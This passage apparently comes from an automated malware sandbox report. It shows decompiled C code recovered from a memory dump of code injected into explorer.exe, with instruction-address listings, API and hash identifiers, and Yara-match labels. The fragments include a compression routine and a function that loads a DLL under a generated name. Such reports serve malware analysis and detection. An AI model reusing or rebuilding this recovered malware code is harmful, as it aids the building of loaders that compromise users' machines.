				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x5deed9c3
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xf8e4158b
					_t12 = _t272 + 0x5c; // 0x35e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E032F71A0(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E032F5F00(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x35e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E032F6040( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xf8e4158b
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xf8e4158b
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x830a74c0
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xf8e4158b
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xf8e4158b
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x5750438
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x35e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x830a74c0
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xf8e4158b
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E032F6040(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xf8e4158b
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x5deed9c3
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x35e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x35e85000
							E032F71A0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E032F5F00( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x35e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                                                                                                            0x032f4186
                                                                                                            0x032f418b
                                                                                                            0x032f418f
                                                                                                            0x032f4192
                                                                                                            0x032f4192
                                                                                                            0x032f4195
                                                                                                            0x032f419a
                                                                                                            0x032f419f
                                                                                                            0x032f41a2
                                                                                                            0x032f41a7
                                                                                                            0x032f41aa
                                                                                                            0x032f41b0
                                                                                                            0x032f41b0
                                                                                                            0x032f41bb
                                                                                                            0x032f41be
                                                                                                            0x032f41c5
                                                                                                            0x032f41ca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f41d0
                                                                                                            0x032f41d5
                                                                                                            0x032f41d5
                                                                                                            0x032f41da
                                                                                                            0x032f41e0
                                                                                                            0x032f41ea
                                                                                                            0x032f41ef
                                                                                                            0x032f41f5
                                                                                                            0x032f4214
                                                                                                            0x032f4217
                                                                                                            0x032f4222
                                                                                                            0x032f4222
                                                                                                            0x032f4222
                                                                                                            0x032f4219
                                                                                                            0x032f4219
                                                                                                            0x032f421b
                                                                                                            0x00000000
                                                                                                            0x032f421d
                                                                                                            0x032f421d
                                                                                                            0x032f421d
                                                                                                            0x032f421b
                                                                                                            0x032f422a
                                                                                                            0x032f422f
                                                                                                            0x032f4234
                                                                                                            0x032f423a
                                                                                                            0x032f423e
                                                                                                            0x032f4241
                                                                                                            0x032f4244
                                                                                                            0x032f424a
                                                                                                            0x032f424f
                                                                                                            0x032f4252
                                                                                                            0x032f4258
                                                                                                            0x032f425d
                                                                                                            0x032f4263
                                                                                                            0x032f4269
                                                                                                            0x032f426e
                                                                                                            0x032f4271
                                                                                                            0x032f4276
                                                                                                            0x032f427a
                                                                                                            0x032f427e
                                                                                                            0x032f4281
                                                                                                            0x032f4284
                                                                                                            0x032f428d
                                                                                                            0x032f4294
                                                                                                            0x032f4297
                                                                                                            0x032f429a
                                                                                                            0x032f429f
                                                                                                            0x032f42a4
                                                                                                            0x032f42a7
                                                                                                            0x032f42aa
                                                                                                            0x032f42aa
                                                                                                            0x032f42ae
                                                                                                            0x032f42b7
                                                                                                            0x032f42be
                                                                                                            0x032f42c1
                                                                                                            0x032f42c6
                                                                                                            0x032f42cb
                                                                                                            0x032f42cb
                                                                                                            0x032f42ce
                                                                                                            0x032f42d3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f41f7
                                                                                                            0x032f41f9
                                                                                                            0x032f4206
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f4206
                                                                                                            0x032f41f9
                                                                                                            0x00000000
                                                                                                            0x032f41f5
                                                                                                            0x032f42d9
                                                                                                            0x032f42de
                                                                                                            0x032f42e1
                                                                                                            0x032f42e4
                                                                                                            0x032f438f
                                                                                                            0x032f438f
                                                                                                            0x032f42ea
                                                                                                            0x032f42ea
                                                                                                            0x032f42ea
                                                                                                            0x032f42ef
                                                                                                            0x032f4319
                                                                                                            0x032f431c
                                                                                                            0x032f431c
                                                                                                            0x032f4321
                                                                                                            0x032f4323
                                                                                                            0x032f4325
                                                                                                            0x032f4328
                                                                                                            0x032f432b
                                                                                                            0x032f4333
                                                                                                            0x032f4338
                                                                                                            0x032f4338
                                                                                                            0x032f433e
                                                                                                            0x032f4341
                                                                                                            0x032f4344
                                                                                                            0x032f4347
                                                                                                            0x032f4349
                                                                                                            0x032f4349
                                                                                                            0x032f434a
                                                                                                            0x032f434a
                                                                                                            0x032f4347
                                                                                                            0x032f4358
                                                                                                            0x032f435b
                                                                                                            0x032f435f
                                                                                                            0x032f4364
                                                                                                            0x032f4367
                                                                                                            0x032f436a
                                                                                                            0x032f436a
                                                                                                            0x032f436a
                                                                                                            0x032f436d
                                                                                                            0x032f436d
                                                                                                            0x032f4370
                                                                                                            0x032f4370
                                                                                                            0x032f42f1
                                                                                                            0x032f42f1
                                                                                                            0x032f4301
                                                                                                            0x032f4304
                                                                                                            0x032f4309
                                                                                                            0x032f4309
                                                                                                            0x032f430c
                                                                                                            0x032f430f
                                                                                                            0x032f4312
                                                                                                            0x032f4314
                                                                                                            0x032f4314
                                                                                                            0x032f4373
                                                                                                            0x032f4375
                                                                                                            0x032f4378
                                                                                                            0x032f4378
                                                                                                            0x032f437e
                                                                                                            0x032f4382
                                                                                                            0x032f4385
                                                                                                            0x032f4387
                                                                                                            0x032f4387
                                                                                                            0x032f4398
                                                                                                            0x032f439a
                                                                                                            0x032f439a
                                                                                                            0x032f43a2
                                                                                                            0x032f43b0
                                                                                                            0x032f43b3
                                                                                                            0x032f43b5
                                                                                                            0x032f43d5
                                                                                                            0x032f43d5
                                                                                                            0x032f43d8
                                                                                                            0x032f43de
                                                                                                            0x032f43df
                                                                                                            0x032f43e2
                                                                                                            0x032f43e4
                                                                                                            0x032f43e7
                                                                                                            0x032f43ea
                                                                                                            0x032f43ed
                                                                                                            0x032f43f1
                                                                                                            0x032f43f4
                                                                                                            0x032f43f7
                                                                                                            0x032f43fa
                                                                                                            0x032f43fc
                                                                                                            0x032f43fc
                                                                                                            0x032f43ff
                                                                                                            0x032f4401
                                                                                                            0x032f4401
                                                                                                            0x032f4404
                                                                                                            0x032f4406
                                                                                                            0x032f4409
                                                                                                            0x032f4411
                                                                                                            0x032f4414
                                                                                                            0x032f4419
                                                                                                            0x032f4419
                                                                                                            0x032f441f
                                                                                                            0x032f4422
                                                                                                            0x032f4425
                                                                                                            0x032f4427
                                                                                                            0x032f4427
                                                                                                            0x032f4428
                                                                                                            0x032f4428
                                                                                                            0x032f4433
                                                                                                            0x032f4433
                                                                                                            0x032f4433
                                                                                                            0x032f4436
                                                                                                            0x032f4439
                                                                                                            0x032f4439
                                                                                                            0x032f443c
                                                                                                            0x032f443c
                                                                                                            0x032f43ff
                                                                                                            0x032f443f
                                                                                                            0x032f4442
                                                                                                            0x032f4445
                                                                                                            0x032f4447
                                                                                                            0x032f444a
                                                                                                            0x032f444c
                                                                                                            0x032f444f
                                                                                                            0x032f4452
                                                                                                            0x032f4454
                                                                                                            0x032f4457
                                                                                                            0x032f445f
                                                                                                            0x032f4467
                                                                                                            0x032f446a
                                                                                                            0x032f446a
                                                                                                            0x032f446a
                                                                                                            0x032f446d
                                                                                                            0x032f446d
                                                                                                            0x032f446d
                                                                                                            0x032f4470
                                                                                                            0x032f4476
                                                                                                            0x032f4478
                                                                                                            0x032f4478
                                                                                                            0x032f447e
                                                                                                            0x032f4484
                                                                                                            0x032f448d
                                                                                                            0x032f4494
                                                                                                            0x032f4496
                                                                                                            0x032f4499
                                                                                                            0x032f4499
                                                                                                            0x032f449c
                                                                                                            0x032f449c
                                                                                                            0x032f449f
                                                                                                            0x032f44a1
                                                                                                            0x032f44a4
                                                                                                            0x032f44a6
                                                                                                            0x032f44c1
                                                                                                            0x032f44c1
                                                                                                            0x032f44c5
                                                                                                            0x032f44c8
                                                                                                            0x032f44cb
                                                                                                            0x032f44ce
                                                                                                            0x032f44e4
                                                                                                            0x032f44e4
                                                                                                            0x032f44e4
                                                                                                            0x032f44d0
                                                                                                            0x032f44d0
                                                                                                            0x032f44d2
                                                                                                            0x032f44d6
                                                                                                            0x032f44d9
                                                                                                            0x00000000
                                                                                                            0x032f44db
                                                                                                            0x032f44db
                                                                                                            0x032f44dd
                                                                                                            0x00000000
                                                                                                            0x032f44df
                                                                                                            0x032f44df
                                                                                                            0x032f44df
                                                                                                            0x032f44dd
                                                                                                            0x032f44d9
                                                                                                            0x032f44e8
                                                                                                            0x032f44eb
                                                                                                            0x032f44f0
                                                                                                            0x032f44fa
                                                                                                            0x032f44fa
                                                                                                            0x032f44fa
                                                                                                            0x032f44fd
                                                                                                            0x032f44a8
                                                                                                            0x032f44a8
                                                                                                            0x032f44aa
                                                                                                            0x032f44b1
                                                                                                            0x032f44b1
                                                                                                            0x032f44b3
                                                                                                            0x032f44b5
                                                                                                            0x032f44b7
                                                                                                            0x032f44bb
                                                                                                            0x032f44bd
                                                                                                            0x032f44bf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f44bf
                                                                                                            0x032f44bb
                                                                                                            0x032f44ac
                                                                                                            0x032f44ac
                                                                                                            0x032f44af
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f44af
                                                                                                            0x032f44aa
                                                                                                            0x032f4507
                                                                                                            0x032f4509
                                                                                                            0x032f4509
                                                                                                            0x032f4514
                                                                                                            0x032f43b7
                                                                                                            0x032f43b7
                                                                                                            0x032f43ba
                                                                                                            0x00000000
                                                                                                            0x032f43bc
                                                                                                            0x032f43bc
                                                                                                            0x032f43be
                                                                                                            0x032f43c2
                                                                                                            0x00000000
                                                                                                            0x032f43c4
                                                                                                            0x032f43c4
                                                                                                            0x032f43c4
                                                                                                            0x032f43c7
                                                                                                            0x00000000
                                                                                                            0x032f43cb
                                                                                                            0x032f43d4
                                                                                                            0x032f43d4
                                                                                                            0x032f43c7
                                                                                                            0x032f43c2
                                                                                                            0x032f43ba
                                                                                                            0x032f43a6
                                                                                                            0x032f43af
                                                                                                            0x032f43af

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3510742995-0
                                                                                                            • Opcode ID: f1afd37047e1a430684766b2403e559c42319dabe810c329b3ba98596797b03d
                                                                                                            • Instruction ID: 77bb82fd6ba54fe992d239d301a3237bd622d69a9ed18c436889e843e3d8fa30
                                                                                                            • Opcode Fuzzy Hash: f1afd37047e1a430684766b2403e559c42319dabe810c329b3ba98596797b03d
                                                                                                            • Instruction Fuzzy Hash: 69D115756106059FDB24DF6EC8C096AF7E5FF88304B68897DE98AC7700D7B1E9848B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032ED31D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E032ED31D(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x32ff8e4; // 0x3310000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E032E9F8F(_t50, 0x2e4);
					_t66 =  *0x32ff8e4; // 0x3310000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E032E9FEE( &_v140, 0x40, L"%08x", E032EE3C8(_t66 + 0xb0, E032EA5DA(_t66 + 0xb0), 0));
					_t20 =  *0x32ff8e4; // 0x3310000
					asm("sbb eax, eax");
					_t25 = E032E9F8F(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000034) + 0xaaa);
					_t26 =  *0x32ff8e4; // 0x3310000
					_t68 = E032E9BF7(_t26 + 0x1020);
					_v12 = _t68;
					E032E8D41( &_v8);
					_t32 =  *0x32ff8e4; // 0x3310000
					_t34 = E032E9BF7(_t32 + 0x122a);
					 *0x32ff9e4 = _t34;
					_t35 =  *0x32ff8e0; // 0x52ef6c8
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x32fc9d8,  &_v140, ".", L"dll", 0, 0x32fc9d8, _t25, 0x32fc9d8, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x32ff9e4);
					 *0x32ff9dc = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E032EF10E(0x32fcbc4, _t60);
					}
					 *0x32ff9e0 = _t38;
					E032E8D86( &_v12, 0xfffffffe);
					E032E8F0A( &_v140, 0, 0x80);
					if( *0x32ff9e0 != 0) {
						goto L10;
					} else {
						E032E8D86(0x32ff9e4, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x32ff9e0 == 0) {
						_t46 =  *0x32ff918; // 0x52ef808
						 *0x32ff9e0 = _t46;
					}
					L10:
					return 1;
				}
			}

























                                                                                                            0x032ed31d
                                                                                                            0x032ed31d
                                                                                                            0x032ed31d
                                                                                                            0x032ed320
                                                                                                            0x032ed32c
                                                                                                            0x032ed337
                                                                                                            0x032ed353
                                                                                                            0x032ed358
                                                                                                            0x032ed361
                                                                                                            0x032ed363
                                                                                                            0x032ed36b
                                                                                                            0x032ed38c
                                                                                                            0x032ed391
                                                                                                            0x032ed39e
                                                                                                            0x032ed3a9
                                                                                                            0x032ed3b7
                                                                                                            0x032ed3c8
                                                                                                            0x032ed3ce
                                                                                                            0x032ed3d1
                                                                                                            0x032ed3e8
                                                                                                            0x032ed3f4
                                                                                                            0x032ed3fc
                                                                                                            0x032ed403
                                                                                                            0x032ed409
                                                                                                            0x032ed415
                                                                                                            0x032ed41b
                                                                                                            0x032ed422
                                                                                                            0x032ed435
                                                                                                            0x032ed424
                                                                                                            0x032ed424
                                                                                                            0x032ed427
                                                                                                            0x032ed42d
                                                                                                            0x032ed432
                                                                                                            0x032ed437
                                                                                                            0x032ed442
                                                                                                            0x032ed454
                                                                                                            0x032ed466
                                                                                                            0x00000000
                                                                                                            0x032ed468
                                                                                                            0x032ed46f
                                                                                                            0x00000000
                                                                                                            0x032ed475
                                                                                                            0x032ed476
                                                                                                            0x032ed476
                                                                                                            0x032ed47d
                                                                                                            0x032ed47f
                                                                                                            0x032ed484
                                                                                                            0x032ed484
                                                                                                            0x032ed489
                                                                                                            0x032ed48d
                                                                                                            0x032ed48d

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID: %08x$dll
                                                                                                            • API String ID: 1029625771-2963171978
                                                                                                            • Opcode ID: 7d60d52cc85edefa8ae4894cb9c6658e0220140e0af219134a8ef8843d286d89
                                                                                                            • Instruction ID: a7ee05da4e32a61889137f8afeb7e65f185015e8b7579a40f86361461ac2931b
                                                                                                            • Opcode Fuzzy Hash: 7d60d52cc85edefa8ae4894cb9c6658e0220140e0af219134a8ef8843d286d89
                                                                                                            • Instruction Fuzzy Hash: C731C676A602057FD710EBA8FE8AFAA73ECEB45664F548176F104D7280EB7499C08760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032F36F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 47%
                                                                                                            			E032F36F2(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E032F360B(_a4);
				 *_t32 = "msxml32.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E032EA5DA();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x32fcf90;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x32fcf90;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L032F89B5();
				return _t29 - _t22;
			}

















                                                                                                            0x032f36f2
                                                                                                            0x032f36fd
                                                                                                            0x032f3704
                                                                                                            0x032f370b
                                                                                                            0x032f3711
                                                                                                            0x032f3719
                                                                                                            0x032f371a
                                                                                                            0x032f371c
                                                                                                            0x032f3721
                                                                                                            0x032f3729
                                                                                                            0x032f3729
                                                                                                            0x032f372c
                                                                                                            0x032f3730
                                                                                                            0x032f3723
                                                                                                            0x032f3723
                                                                                                            0x032f3727
                                                                                                            0x032f3729
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f3729
                                                                                                            0x032f3727
                                                                                                            0x032f3739
                                                                                                            0x032f3742
                                                                                                            0x032f3747
                                                                                                            0x032f374a
                                                                                                            0x032f374d
                                                                                                            0x032f3750
                                                                                                            0x032f3752
                                                                                                            0x032f3752
                                                                                                            0x032f3758
                                                                                                            0x032f375b
                                                                                                            0x032f375e
                                                                                                            0x032f3761
                                                                                                            0x032f3766
                                                                                                            0x032f3768
                                                                                                            0x032f3768
                                                                                                            0x032f376e
                                                                                                            0x032f377a
                                                                                                            0x032f377c
                                                                                                            0x032f3788

                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 032F3739
                                                                                                            • _ftol2_sse.MSVCRT ref: 032F377C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _ftol2_sselstrlen
                                                                                                            • String ID: msxml32.dll
                                                                                                            • API String ID: 1292649733-2051705522
                                                                                                            • Opcode ID: 5995a8d9eeceb1bbde181764f347b04b72c89d25c98985c1e66c886a6668b7e0
                                                                                                            • Instruction ID: d66e6bd230a1ec43c4ad73f9ef7cda45d6a3675d90390c12531174d7728a06c3
